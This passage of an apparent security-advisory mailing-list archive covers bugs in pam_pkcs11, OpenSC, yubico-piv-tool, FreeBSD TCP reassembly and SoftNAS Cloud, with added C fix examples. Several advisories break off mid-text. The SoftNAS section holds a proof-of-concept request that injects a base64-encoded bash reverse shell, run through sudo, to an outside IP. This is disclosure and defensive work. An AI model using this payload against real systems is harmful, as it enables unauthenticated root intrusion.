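    return hex_encode(bytes, sizeof bytes, out, cap > sizeof out ? sizeof out : cap);
}
```

The output needs exactly 12 bytes for the sample response; a capacity of 11 is refused before the second entry is written, instead of placing its NUL one byte past the end as the original check allows.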


Workarounds
- ---
None

Timeline

2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Automated vendor reply
2018-05-23

X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11

2018-08-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-003

Multiple Vulnerabilities in pam_pkcs11
==


Overview
- 
Confirmed Affected Versions: 0.6.9
Confirmed Patched Versions: -
Vendor: Unmaintained
Vendor URL: https://github.com/OpenSC/pam_pkcs11
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-003-pam_pkcs11/


Summary and Impact
- --
It is possible to replay an authentication by using a specially
prepared smartcard or token in case pam-pkcs11 is compiled with NSS
support. Furthermore two minor implementation issues have been identified.
X41 did not perform a full test or audit on the software.


Product Description
- ---
This Linux-PAM login module allows a X.509 certificate based user
login. The certificate and its dedicated private key are thereby
accessed by means of an appropriate PKCS #11 module. For the
verification of the users' certificates, locally stored CA
certificates as well as either online or locally accessible CRLs are
used.

Authentication Replay
=
Severity Rating: High
Vector: Login attempt at compromised machine
CVE: -
CWE: 125
CVSS Score: 7.0 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N


Summary and Impact
- --
A replay attack is possible due to a logic bug in file pam_pkcs11.c. In
function `pam_sm_authenticate()` a nonce is generated and signed with the
card to verify that the card holds the matching secret key, if a valid
certificate is found. This is done using the function `get_random_value()`,
which in turn calls `PK11_GenerateRandom()`, which queries the smartcard
for random data.
This allows for a replay attack with a malicious smartcard. If a user
plugs his card into a compromised computer, the nonce and answer
can be recorded by an attacker. The attacker then modifies a smartcard
or a smartcard emulator to replay the exact same nonce and signed
data, which allows the attacker to log in to another computer without
having further access to the smartcard.


Workarounds
- ---
Switch to pam_p11.

Buffer Overflow
===
Severity Rating: Low
Vector: Overly long user home directory
CVE: -
CWE: 121
CVSS Score: -
CVSS Vector: -


Summary and Impact
- --
In file openssh_mapper.c a stack based buffer overflow is possible if a
user has a home directory with a length of more than 512 bytes. This
allows to overwrite the passwd structure and possibly the return
address in `openssh_mapper_match_user()`;

{% highlight c %}
/* openssh_mapper.c */
static int openssh_mapper_match_user(X509 *x509, const char *user, void *context) {
    struct passwd *pw;
    char filename[512];
    if (!x509) return -1;
    if (!user) return -1;
    pw = getpwnam(user);
    if (!pw || is_empty_str(pw->pw_dir) ) {
        DBG1("User '%s' has no home directory",user);
        return -1;
    }
    /* unbounded: a pw_dir longer than the remaining room overflows filename */
    sprintf(filename,"%s/.ssh/authorized_keys",pw->pw_dir);
    return openssh_mapper_match_keys(x509,filename);
}
{% endhighlight %}
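One way to close the overflow above is to build the path with snprintf() and treat truncation as an error rather than as a shorter string. The C example below is added here and is not pam_pkcs11 code; build_authorized_keys_path() and match_user_checked() are hypothetical names, and the 600-byte home directory is constructed to exercise the overlong case the advisory describes.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Builds "<home>/.ssh/authorized_keys" into `out` (capacity `cap`). Returns
 * 0 on success and -1 if the path would be truncated: with sprintf(), as in
 * the advisory's code, an overlong home silently overflows instead. */
static int build_authorized_keys_path(const char *home, char *out, size_t cap)
{
    int n = snprintf(out, cap, "%s/.ssh/authorized_keys", home);
    if (n < 0 || (size_t)n >= cap) {
        if (cap > 0)
            out[0] = '\0';                   /* never hand back a partial path */
        return -1;
    }
    return 0;
}

/* Hypothetical stand-in for openssh_mapper_match_user(): same 512-byte
 * filename[] as the advisory, but an overlong home directory is refused
 * instead of overflowing the stack. */
static int match_user_checked(const char *home, char filename[512])
{
    if (home == NULL || home[0] == '\0')
        return -1;                            /* "User has no home directory" */
    if (build_authorized_keys_path(home, filename, 512) != 0)
        return -1;                            /* path does not fit: refuse the user */
    return 0;                                 /* would go on to match keys in filename */
}

/* Constructed case from the advisory: a home directory of 600 bytes. */
static int demo_overlong_home(void)
{
    char home[601];
    char filename[512];
    memset(home, 'a', 600);
    home[600] = '\0';
    return match_user_checked(home, filename);          /* -1 */
}

/* Constructed normal case: returns 1 when the expected path was built. */
static int demo_normal_home(void)
{
    char filename[512];
    return match_user_checked("/home/alice", filename) == 0 &&
           strcmp(filename, "/home/alice/.ssh/authorized_keys") == 0;
}
```

Refusing the user on truncation is the safe choice here: a silently shortened path would point the key lookup at a file the user does not own.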


Workarounds
- ---
Switch to pam_p11.

Memory not cleaned properly before free()
=
Severity Rating: Low
Vector: -
CVE: -
CWE: 244
CVSS Score: -
CVSS Vector: -

Summary and Impact
- --
In several places memory is set to zero using memset() and passed on
to free() afterwards. This is a pattern which modern compilers
optimize away, which renders the call to memset() useless. This causes
sensitive data such as passwords to remain in the memory, which
defeats the original intention of the code.

{% highlight c %}
   memset(password, 0, strlen(password));
   free(password);
{% endhighlight %}
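The example below, added here and not pam_pkcs11 code, shows the usual way to keep the wipe from being optimized away: call memset() through a volatile function pointer so the compiler cannot recognize the store as dead. secure_zero(), free_secret() and the "hunter2" secret are constructed for the example.

```c
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

/* memset() reached through a volatile function pointer: the compiler cannot
 * see which function is called, so it cannot treat the store as dead and
 * drop it before free(), which is the optimization the advisory describes.
 * explicit_bzero(3) (BSD, glibc) or memset_s() (C11 Annex K) are the
 * library equivalents where available. */
static void *(*volatile secure_memset)(void *, int, size_t) = memset;

static void secure_zero(void *p, size_t len)
{
    if (p != NULL && len > 0)
        secure_memset(p, 0, len);
}

/* Wipes a NUL-terminated secret before releasing it; returns the number of
 * bytes that were wiped. */
static size_t free_secret(char *secret)
{
    if (secret == NULL)
        return 0;
    size_t len = strlen(secret);
    secure_zero(secret, len);
    free(secret);
    return len;
}

/* Demonstration on a constructed secret kept in a stack buffer so the wiped
 * bytes can still be inspected afterwards. Returns 1 if all bytes are zero. */
static int demo_wipe(void)
{
    char buf[] = "hunter2";
    secure_zero(buf, sizeof buf);
    for (size_t i = 0; i < sizeof buf; i++)
        if (buf[i] != 0)
            return 0;
    return 1;
}

/* Heap variant matching the advisory's memset()-then-free() pattern. */
static size_t demo_free_secret(void)
{
    char *p = malloc(8);
    if (p == NULL)
        return 0;
    memcpy(p, "hunter2", 8);
    return free_secret(p);                    /* 7 */
}
```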


Workarounds
- ---
Switch to pam_p11.

Timeline

2018-02-03 Issues found
2018-04-18 Vendor contacted
2018-04-18 Vendor reply
2018-05-18 Technical details provided
2018-05-24 Private git branch created, issues fixed
2018-08-08 Patched version released at
https://github.com/x41sec/pam_pkcs11
2018-08-11 Advisory released
- -- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier

X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC

2018-08-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-002

Multiple Vulnerabilities in OpenSC
==


Overview
- 
Confirmed Affected Versions: 0.18.0
Confirmed Patched Versions: possibly 0.19.0
Vendor: OpenSC
Vendor URL: https://github.com/OpenSC/OpenSC
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/


Summary and Impact
- --
Multiple issues have been identified in OpenSC, ranging from stack
based buffer overflows to out of bounds reads and writes on the heap.
They can be triggered by malicious smartcards sending malformed
responses to APDU commands. In addition to the fixes reported here,
many minor issues (e.g. OOB reads and similar) have been reported
and fixed. The OpenSC team (especially Frank Morgner) did an excellent
job of identifying and fixing further issues.
Due to the large number of issues, no individual issues have been
rated with CVSS / CVE ID yet.
X41 did not perform a full test or audit on the software, but tried to
help identify as many bugs as possible over the course of a year.


Product Description
- ---
OpenSC provides a set of libraries and utilities to work with smart
cards. Its main focus is on cards that support cryptographic
operations, and facilitate their use in security applications such as
authentication, mail encryption and digital signatures.

OOB Write in muscle_list_files()
==
In function muscle_list_files() in file src/libopensc/card-muscle.c an
out of bounds write might occur, since bufLen is not checked.

{% highlight c %}
static int muscle_list_files(sc_card_t *card, u8 *buf, size_t bufLen)
{
    muscle_private_t *priv = MUSCLE_DATA(card);
    mscfs_t *fs = priv->fs;
    int x;
    int count = 0;
    mscfs_check_cache(priv->fs);
    for(x = 0; x < fs->cache.size; x++) {
        u8 *oid = fs->cache.array[x].objectId.id;
        sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
            "FILE: %02X%02X%02X%02X\n",
            oid[0],oid[1],oid[2],oid[3]);
        if(0 == memcmp(fs->currentPath, oid, 2)) {
            /* bufLen is never consulted before these writes */
            buf[0] = oid[2];
            buf[1] = oid[3];
            if(buf[0] == 0x00 && buf[1] == 0x00) continue;
            /* No directories/null names outside of root */
            buf += 2;
            count+=2;
        }
    }
    return count;
}
{% endhighlight %}


OOB Write in tcos_select_file()
=
In function tcos_select_file() in file src/libopensc/card-tcos.c a
filename is extracted from an APDU response and written into the
internal file->name variable.

{% highlight c %}
case 0x84:
memcpy(file->name, d, len);
file->namelen = len;
break;
{% endhighlight %}

No check is performed whether the string retrieved from the card fits
into the buffer, which could trigger an OOB write.

OOB Write in piv_validate_general_authentication()

In case piv_validate_general_authentication() in
src/libopensc/card-piv.c is called with a datalen parameter greater
than 4096, an out of bound write occurs. Currently no caller seems to
do this.

OOB Write in gemsafe_get_cert_len()
=
The function gemsafe_get_cert_len() in file
src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys
and gemsafe_cert arrays in case more than 12 containers are stored on
the card.

{% highlight c %}
ind = 2; /* skip length */
while (ibuf[ind] == 0x01) {
    if (ibuf[ind+1] == 0xFE) {
        /* i is never compared with the size of the 12-entry arrays */
        gemsafe_prkeys[i].ref = ibuf[ind+4];
        sc_log(card->ctx, "Key container %d is allocated and uses keyref %d",
               i+1, gemsafe_prkeys[i].ref);
        ind += 9;
    }
    else {
        gemsafe_prkeys[i].label = NULL;
        gemsafe_cert[i].label = NULL;
        sc_log(card->ctx, "Key container %d is unallocated", i+1);
        ind += 8;
    }
    i++;
}
{% endhighlight %}
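The three writes above share one root cause: a length or count that comes from the card is used to index a fixed-size destination without being compared with that destination's size. The C example below, added here and not OpenSC code, shows the bounded form of each: list_files_checked() compares bufLen before each 2-byte write (muscle_list_files()), set_file_name_checked() rejects a tag 0x84 name longer than the name field (tcos_select_file()), and count_containers_checked() stops once the container table would exceed the array (gemsafe_get_cert_len()) or the bytes received. The structures, the 16-byte name field, the cache entries and the container table are constructed stand-ins for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

typedef uint8_t u8;

/* --- muscle_list_files(): constructed cache entry with a 4-byte object id --- */
typedef struct { u8 id[4]; } fake_object_t;

/* Writes the 2-byte id of every object under `current_path` into `buf`,
 * checking bufLen before each write. Returns bytes written, or -1 when the
 * caller's buffer cannot take the next entry. */
static long list_files_checked(const fake_object_t *objs, size_t nobj,
                               const u8 current_path[2], u8 *buf, size_t bufLen)
{
    size_t count = 0;
    for (size_t x = 0; x < nobj; x++) {
        const u8 *oid = objs[x].id;
        if (memcmp(current_path, oid, 2) != 0)
            continue;
        if (oid[2] == 0x00 && oid[3] == 0x00)
            continue;                     /* no directories/null names outside of root */
        if (bufLen - count < 2)
            return -1;                    /* the check the original lacks */
        buf[count]     = oid[2];
        buf[count + 1] = oid[3];
        count += 2;
    }
    return (long)count;
}

/* --- tcos_select_file(): fixed-size name field, as in sc_file_t --- */
typedef struct { u8 name[16]; size_t namelen; } fake_file_t;

/* Copies a card-supplied name (FCI tag 0x84) only if it fits. */
static int set_file_name_checked(fake_file_t *file, const u8 *d, size_t len)
{
    if (len > sizeof file->name)
        return -1;
    memcpy(file->name, d, len);
    file->namelen = len;
    return 0;
}

/* --- gemsafe_get_cert_len(): container index bounded by the array --- */
/* Walks the container table in `ibuf` (starting after a 2-byte length).
 * Each entry starts with 0x01; 0xFE marks an allocated container whose key
 * reference is 3 bytes further on (9-byte entry), anything else an
 * unallocated one (8-byte entry). Returns the number of containers, or -1
 * if the table would overrun `max` slots or the received bytes. */
static long count_containers_checked(const u8 *ibuf, size_t ibuf_len,
                                     int *refs, size_t max)
{
    size_t ind = 2, i = 0;
    while (ind < ibuf_len && ibuf[ind] == 0x01) {
        if (i >= max || ind + 1 >= ibuf_len)
            return -1;
        if (ibuf[ind + 1] == 0xFE) {
            if (ind + 4 >= ibuf_len)
                return -1;
            refs[i] = ibuf[ind + 4];
            ind += 9;
        } else {
            refs[i] = -1;                 /* unallocated */
            ind += 8;
        }
        i++;
    }
    return (long)i;
}

/* Demonstrations on constructed data. */
static long demo_list_files(size_t bufLen)
{
    const fake_object_t objs[] = {
        {{0x3F, 0x00, 0x00, 0x01}}, {{0x3F, 0x00, 0x00, 0x00}},
        {{0x3F, 0x00, 0x12, 0x34}}, {{0x12, 0x34, 0x56, 0x78}} };
    const u8 path[2] = {0x3F, 0x00};
    u8 buf[8];
    return list_files_checked(objs, 4, path, buf,
                              bufLen > sizeof buf ? sizeof buf : bufLen);
}

static int demo_set_name(size_t len)
{
    u8 name[32];
    fake_file_t file;
    memset(name, 'N', sizeof name);
    return set_file_name_checked(&file, name, len > sizeof name ? sizeof name : len);
}

static long demo_containers(size_t max)
{
    /* 13 allocated containers, each with key reference 0x05, then a terminator */
    u8 ibuf[2 + 13 * 9 + 1] = {0x00, 0x00};
    int refs[13];
    for (size_t k = 0; k < 13; k++) {
        ibuf[2 + k * 9]     = 0x01;
        ibuf[2 + k * 9 + 1] = 0xFE;
        ibuf[2 + k * 9 + 4] = 0x05;
    }
    return count_containers_checked(ibuf, sizeof ibuf, refs, max);
}
```

With a 12-slot array the 13-container table is rejected, which is exactly the case the advisory describes for gemsafe_prkeys and gemsafe_cert.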


OOB Write in util_acl_to_str()

In function util_acl_to_str() in file src/tools/util.c no checks are
performed whether the string put together fits into line, which could
be abused to trigger limited out of bounds writes.

OOB Write in read_public_key() and read_private_key()
=
In function read_public_key() in file src/tools/cryptoflex-tool.c the
bufsize variable is overwritten with file->size retrieved from the
smartcar

X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv

2018-08-14 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-001

Multiple Vulnerabilities in Yubico Piv
==


Overview
- 
Confirmed Affected Versions: 1.5.0
Confirmed Patched Versions: 1.6.0
Vendor: Yubico
Vendor URL: https://www.yubico.com/
Vendor Advisory URL: https://www.yubico.com/support/security-advisories
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-001-Yubico-Piv/


Summary and Impact
------------------
A buffer overflow and an out-of-bounds memory read were identified in
yubico-piv-tool 1.5.0; both can be triggered by a malicious token.
X41 did not perform a full test or audit on the software.


Product Description
-------------------
YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey 4C Nano, and YubiKey
NEO provide Smart Card functionality based on the Personal Identity
Verification (PIV) interface specified in NIST SP 800-73,
“Cryptographic Algorithms and Key Sizes for PIV.”

Out of Bounds Write via Malicious APDU
======================================
Severity Rating: High
Vector: APDU Response
CVE: CVE-2018-14779
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H


Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function
ykpiv_transfer_data()

{% highlight c %}
if(*out_len + recv_len - 2 > max_out) {
  /* the size check only logs; execution falls through to the memcpy() below */
  fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.",
          *out_len + recv_len - 2, max_out);
}
if(out_data) {
  memcpy(out_data, data, recv_len - 2);
  out_data += recv_len - 2;
  *out_len += recv_len - 2;
}
{% endhighlight %}

The code checks whether the output buffer is large enough for the data
that memcpy() is about to copy, but a failed check only prints a message:
nothing stops the memcpy() from running, so the copy overflows the buffer.
This code path can be triggered with malicious data coming from a
smartcard.
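As an added illustration, and not Yubico's code, the same copy with the error handling the snippet lacks. The structure, function and error names are chosen here, and the response chunks are constructed; the only behaviour taken from the snippet is that the last two bytes of each chunk are the status word and are dropped.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Result codes for this example (names chosen here, not the library's). */
enum { APDU_OK = 0, APDU_ERR_SHORT = -1, APDU_ERR_SIZE = -2 };

/* Caller-owned output buffer: fixed capacity, 'used' grows as chunks arrive. */
struct outbuf {
    uint8_t *data;
    size_t   capacity;
    size_t   used;
};

/*
 * Append one APDU response chunk to 'out', dropping the two trailing
 * status-word bytes (SW1 SW2) as ykpiv_transfer_data() does.  Unlike the
 * snippet in the advisory, a failed size check returns an error before
 * memcpy() runs, so nothing is ever written past the end of the buffer.
 */
int append_response_chunk(struct outbuf *out, const uint8_t *chunk, size_t recv_len)
{
    size_t payload;

    if (recv_len < 2)
        return APDU_ERR_SHORT;          /* no status word: recv_len - 2 would wrap */
    payload = recv_len - 2;
    /* Compare against the remaining room; in this form the check cannot overflow. */
    if (payload > out->capacity - out->used)
        return APDU_ERR_SIZE;
    memcpy(out->data + out->used, chunk, payload);
    out->used += payload;
    return APDU_OK;
}

int main(void)
{
    /* Constructed sample: an 8-byte output buffer and two chunks carrying
     * 9 payload bytes in total, the situation the advisory describes. */
    uint8_t store[8];
    struct outbuf out = { store, sizeof store, 0 };
    const uint8_t chunk1[] = { 1, 2, 3, 4, 5, 0x90, 0x00 };
    const uint8_t chunk2[] = { 6, 7, 8, 9, 0x90, 0x00 };
    int rc;

    rc = append_response_chunk(&out, chunk1, sizeof chunk1);
    printf("chunk1: rc=%d used=%zu\n", rc, out.used);
    rc = append_response_chunk(&out, chunk2, sizeof chunk2);
    printf("chunk2: rc=%d used=%zu\n", rc, out.used);
    return 0;
}
```

The second chunk is refused and `used` stays at 5; a chunk shorter than the status word is also refused, which closes the `recv_len - 2` underflow that a bare size comparison would miss.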


Workarounds
-----------
None

Out of Bounds Read via malicious APDU
=====================================
Severity Rating: LOW
Vector: APDU Response
CVE: CVE-2018-14780
CWE: 125
CVSS Score: 2.2 (Low)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N


Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function
_ykpiv_fetch_object()

{% highlight c %}
if(sw == SW_SUCCESS) {
  size_t outlen;
  int offs = _ykpiv_get_length(data + 1, &outlen);
  if(offs == 0) {
    return YKPIV_SIZE_ERROR;
  }
  /* outlen comes from the card and is never compared with the bytes received */
  memmove(data, data + 1 + offs, outlen);
  *len = outlen;
  return YKPIV_OK;
} else {
  return YKPIV_GENERIC_ERROR;
}
{% endhighlight %}

In the end, a memmove() is performed with a length taken from the APDU
data itself. That length is never checked against the amount of APDU data
actually received, so the memmove() can read bytes beyond the end of the
allocated data buffer and copy them into the front of that buffer.
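An added example, not the library's code, of the unwrap step with the missing check. It assumes the object layout the snippet implies (a tag byte, a BER length, then the value) and that the length is either short form or the 0x81/0x82 long forms; function names are chosen here and the responses are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Decode a BER length field at buf[0], the job _ykpiv_get_length() does in
 * the snippet, but bounded by 'avail', the number of bytes actually present.
 * Returns the number of length bytes consumed, or 0 on error.  Assumed
 * forms: short (0x00..0x7F), 0x81 nn and 0x82 nn nn.
 */
size_t ber_get_length(const uint8_t *buf, size_t avail, size_t *out_len)
{
    if (avail < 1)
        return 0;
    if (buf[0] < 0x80) {
        *out_len = buf[0];
        return 1;
    }
    if (buf[0] == 0x81) {
        if (avail < 2)
            return 0;
        *out_len = buf[1];
        return 2;
    }
    if (buf[0] == 0x82) {
        if (avail < 3)
            return 0;
        *out_len = ((size_t)buf[1] << 8) | buf[2];
        return 3;
    }
    return 0;                               /* longer forms are not accepted */
}

/*
 * Unwrap a fetched object in place.  'data' holds [tag][length][value] and
 * 'received' is how many bytes the card actually returned.  The value is
 * moved to the front of 'data' and its size stored in *len.  The added check
 * rejects a declared length that runs past the received bytes, so memmove()
 * never reads beyond them.
 */
int fetch_object_unwrap(uint8_t *data, size_t received, size_t *len)
{
    size_t value_len, offs;

    if (received < 2)                       /* need a tag and one length byte */
        return -1;
    offs = ber_get_length(data + 1, received - 1, &value_len);
    if (offs == 0)
        return -1;
    if (value_len > received - 1 - offs)    /* length claims more than was received */
        return -1;
    memmove(data, data + 1 + offs, value_len);
    *len = value_len;
    return 0;
}

int main(void)
{
    /* Constructed responses: a well-formed 3-byte object and one whose length lies. */
    uint8_t good[] = { 0x53, 0x03, 'a', 'b', 'c' };
    uint8_t bad[]  = { 0x53, 0x81, 0x10, 'x' };   /* claims 16 bytes, only 1 follows */
    size_t n = 0;
    int rc;

    rc = fetch_object_unwrap(good, sizeof good, &n);
    printf("good: rc=%d len=%zu\n", rc, n);
    rc = fetch_object_unwrap(bad, sizeof bad, &n);
    printf("bad:  rc=%d\n", rc);
    return 0;
}
```

The check is `value_len > received - 1 - offs`, written so that the subtraction cannot wrap, since `ber_get_length()` guarantees `offs <= received - 1`.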


Workarounds
-----------
None

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug
2018-08-01 CVE ID requested
2018-08-02 CVE ID assigned
2018-08-08 Patched version released by vendor
2018-08-11 Advisory released
-- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier


FreeBSD Security Advisory FreeBSD-SA-18:08.tcp

2018-08-06 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-18:08.tcp                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in TCP reassembly

Category:       core
Module:         inet
Announced:      2018-08-06
Credits:        Juha-Matti Tilli from Aalto University, Department of
                Communications and Networking and Nokia Bell Labs
Affects:        All supported versions of FreeBSD.
Corrected:      2018-08-06 18:46:09 UTC (stable/11, 11.1-STABLE)
                2018-08-06 17:47:47 UTC (releng/11.2, 11.2-RELEASE-p1)
                2018-08-06 17:48:46 UTC (releng/11.1, 11.1-RELEASE-p12)
                2018-08-06 18:47:03 UTC (stable/10, 10.4-STABLE)
                2018-08-06 17:50:40 UTC (releng/10.4, 10.4-RELEASE-p10)
CVE Name:       CVE-2018-6922

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data
stream service.

To transmit a stream of data, TCP breaks the data stream into segments
for transmission through the Internet, and reassembles the segments at
the receiving side to recreate the data stream.

II.  Problem Description

One of the data structures that holds TCP segments uses an inefficient
algorithm to reassemble the data. This causes the CPU time spent on
segment processing to grow linearly with the number of segments in the
reassembly queue.

III. Impact

An attacker who has the ability to send TCP traffic to a victim system
can degrade the victim system's network performance and/or consume
excessive CPU by exploiting the inefficiency of TCP reassembly
handling, with relatively small bandwidth cost.

IV.  Workaround

As a workaround, system administrators should configure their systems
to only accept TCP connections from trusted end-stations, if it is
possible to do so.

For systems which must accept TCP connections from untrusted
end-stations, the workaround is to limit the size of each reassembly
queue. The capability to do that is added by the patches noted in the
"Solution" section below.

V.   Solution

As a temporary solution to this problem, these patches limit the size
of each TCP connection's reassembly queue. The value is controlled by
a sysctl (net.inet.tcp.reass.maxqueuelen), which sets the maximum
number of TCP segments that can be outstanding on a session's
reassembly queue. This value defaults to 100.

Note that setting this value too low could impact the throughput of
TCP connections which experience significant loss or
reordering. However, the higher this number is set, the more resources
can be consumed on TCP reassembly processing.

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-10.patch.asc
# gpg --verify tcp-10.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch
# fetch https://security.FreeBSD.org/patches/SA-18:08/tcp-11.patch.asc
# gpg --verify tcp-11.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/10/                                                        r337392
releng/10.4/                                                      r337389
stable/11/                                                        r337391
releng/11.1/                                                      r337388
releng/11.2/

[CORE-2018-0009] - SoftNAS Cloud OS Command Injection

2018-07-26 Thread Core Security Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SoftNAS Cloud OS Command Injection

1. *Advisory Information*

Title: SoftNAS Cloud OS Command Injection
Advisory ID: CORE-2018-0009
Advisory URL:
http://www.coresecurity.com/advisories/softnas-cloudnas-OS-command-injection
Date published: 2018-07-26
Date of last update: 2018-05-28
Vendors contacted: SoftNAS
Release mode: Coordinated release

2. *Vulnerability Information*

Class:  Improper Neutralization of Special Elements used in an OS
Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-14417

3. *Vulnerability Description*

SoftNAS' website states that:

[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual
storage appliance that runs within public, private or hybrid clouds.
SoftNAS Cloud provides enterprise-grade NAS capabilities, including
encryption, snapshots, rapid rollbacks, and cross-zone high-availability
with automatic failover.

A command injection vulnerability was found in the web administration
console. In particular, the snserv script did not sanitize some input
parameters before executing a system command.

4. *Vulnerable Packages*

. SoftNAS Cloud versions prior to 4.0.3
Other products and versions might be affected, but they were not tested.


5. *Vendor Information, Solutions and Workarounds*

SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported
vulnerability. The software update can be performed via the
StorageCenter admin UI in the product.
For more information on the updating process see:
https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.

In addition, SoftNAS published the following release note:
https://docs.softnas.com/display/SD/Release+Notes

6. *Credits*

The vulnerability was discovered and researched by Fernando Diaz and
Fernando Catoira from Core Security Consulting Services. The publication
of this advisory was coordinated by Leandro Cuozzo from Core Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Check and execute update functionality abuse leading to command
execution*
[CVE-2018-14417]
The 'recentVersion' parameter from the snserv endpoint is vulnerable to
OS Command Injection when check and execute update operations are
performed.
This endpoint has no authentication/session verification. Therefore, it
is possible for an unauthenticated attacker to execute malicious code on
the target server. As the web server runs as a sudoer user (apache), the
malicious code can be executed with root permissions.

The following part of the /etc/sudoers file shows the apache user
capabilities.

/-
User_Alias  APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that
require sudo access!!
Cmnd_Alias  SOFTNAS = ALL
APACHE  ALL = (ALL) NOPASSWD: SOFTNAS
-/

The following proof of concept generates a remote shell on the target
system as root:

/-
GET
/softnas/snserver/snserv.php?opcode=checkupdate=executeupdate=3.6aaa.1aa_type=standard=3.6aaa.1aaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
HTTP/1.1
Host: 10.2.45.208
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.208/softnas/applets/update/
X-Requested-With: XMLHttpRequest
Connection: close
-/

As can be seen in the request above, the payload had to be base64
encoded because some special characters were not being properly decoded.
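An added example (not SoftNAS's code), in C, of the two controls that close this class of bug: an allow-list check on the version parameter and an argv-based exec that never involves a shell. The helper path and the accepted update types are hypothetical placeholders, and the inputs in main() are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical update helper; the product's real path is not on the page. */
#define UPDATE_HELPER "/usr/local/bin/softnas-update"

/*
 * Allow-list check for a version parameter: exactly three groups of 1-6
 * digits separated by dots ("4.0.3").  Anything else, including the ';'
 * that would end a shell command, is rejected before it gets near one.
 */
int is_valid_version(const char *v)
{
    int parts = 0;
    if (v == NULL)
        return 0;
    for (;;) {
        int digits = 0;
        while (isdigit((unsigned char)*v)) {
            v++;
            digits++;
        }
        if (digits == 0 || digits > 6)
            return 0;
        parts++;
        if (*v == '\0')
            break;
        if (*v != '.')
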